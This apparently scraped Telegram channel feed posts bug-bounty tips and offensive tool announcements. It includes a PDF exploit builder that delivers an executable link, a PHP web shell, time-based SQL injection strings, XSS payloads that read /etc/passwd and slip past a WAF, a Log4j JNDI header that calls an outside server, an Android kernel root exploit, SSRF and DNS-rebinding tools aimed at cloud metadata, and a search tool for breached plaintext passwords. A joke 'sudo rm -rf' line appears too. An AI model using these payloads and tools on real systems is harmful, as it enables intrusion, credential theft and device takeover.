LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
Requirements:
pip install -r requirements.txtLeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]BugCod3#Python #Search #Parse #Password
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3β€2β‘1π1π―1
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).
Put your exe-link and build the PDF-FILE
BugCod3#C #PDF #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
β‘3π₯3β€2π2
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.
β β)Tab key)cd command)upload <destination_file_name> command)download <file_name> command)Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php
BugCod3#PHP #Shell #Pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3β‘2β€1
If you find Web frameworks like Symfony, add
to the wordlist, and you may get juicy data.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'to the wordlist, and you may get juicy data.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯5β‘2β€1
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘8β€1π1
Canarytokens
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
π Site
#Pentesting #BugBounty
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
π Site
#Pentesting #BugBounty
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!
Site
ΞYγIαγ³Ξ πΎ
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Site
ΞYγIαγ³Ξ πΎ
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘2π₯1
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘2β€1π₯1
For 0Day SQLI in
(app extension)
payload was:
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘1π1π₯1
XSS to Exfiltrate Data from PDFs
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(βGETβ,βfile:///etc/hostsβ);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(βGETβ,βfile:///etc/passwdβ);x.send();</script>How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π₯3β€2β‘1
βββ(BugCod3γΏkali)-[~]
ββ$ sudo rm -rf *1402
βββ(BugCod3γΏkali)-[~]
ββ$ sudo mkdir 1403#Notification #NewYear
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€5β‘1π₯1
If you are testing API, before fuzzing observe these:
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
π3β€1β‘1π₯1
Akamai WAF bypass XSS
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1
Log4j π Application was running java
Vulnerable header :
#BugBounty #Tips #Security
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1
Easy P1 π₯
Add to your wordlist
#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2#BugBounty #Tips
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€1β‘1π₯1
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
Pixel 7 Pro:
Pixel 7 Pro:
Pixel 7:
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
Github
β¬οΈ Download
π
#C #Exploit #Android #Kernel #Pixel
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keysPixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keysVulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.Github
β¬οΈ Download
π
BugCod3#C #Exploit #Android #Kernel #Pixel
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€1β‘1π1π₯1
java2S3 Amazon S3 Bucket Enumeration Tool
Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
βͺοΈ Fetches HTTP status codes for subdomains
βͺοΈ Retrieves JavaScript URLs associated with each subdomain
βͺοΈ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
Usage:
Create a text file (
Github
β¬οΈ Download
π
#Python #Amazon #S3 #Buckets
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
βͺοΈ Fetches HTTP status codes for subdomains
βͺοΈ Retrieves JavaScript URLs associated with each subdomain
βͺοΈ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests
Usage:
Create a text file (
input.txt) containing a list of subdomains (one per line).python js2s3.py input.txt example.com output.txt
Github
β¬οΈ Download
π
BugCod3#Python #Amazon #S3 #Buckets
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘2β€1π₯1
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
Usage (command line):
Github
β¬οΈ Download
π
#Ruby #Proxy #SSRF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
gem install ssrf_proxy
Usage (command line):
ssrf-proxy [options] -u <SSRF URL>
ssrf-proxy -u http://target/?url=xxURLxx
Github
β¬οΈ Download
π
BugCod3#Ruby #Proxy #SSRF
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β€2β‘1π₯1
httprebind
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
Usage:
Where
Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
β¬οΈ Download
π
#Python #DNS #SSRF #Attack
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
sudo pip install dnslib flask flask_cors
Usage:
sudo python httprebind.py domain.name serverIp mode
Where
mode is one of: ec2, ecs, gcloudMake sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
β¬οΈ Download
π
BugCod3#Python #DNS #SSRF #Attack
ββββββββββ
π€ T.me/BugCod3BOT
π£ T.me/BugCod3
β‘1β€1π₯1